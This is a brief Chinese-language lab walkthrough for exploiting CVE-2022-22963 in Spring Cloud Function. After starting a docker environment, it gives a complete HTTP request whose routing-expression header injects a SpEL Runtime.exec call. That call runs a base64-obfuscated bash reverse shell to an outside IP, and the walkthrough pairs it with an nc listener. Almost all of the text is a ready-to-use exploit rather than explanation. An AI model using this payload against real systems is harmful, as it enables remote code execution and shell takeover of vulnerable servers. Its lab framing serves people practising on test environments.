1.执行以下命令启动靶场环境并在浏览器访问

cd spring/CVE-2022-22963
docker-compose up -d
docker ps

2.反弹shell

构造payload

页面刷新抓包，修改内容

POST /functionRouter HTTP/1.1
Host: 192.168.0.107:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTMuMjMxLjAvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}")
Content-Type: text/plain
Content-Length: 8

test

开启监听，执行反弹

nc -lvvp 7777

放包，成功反弹，命令执行成功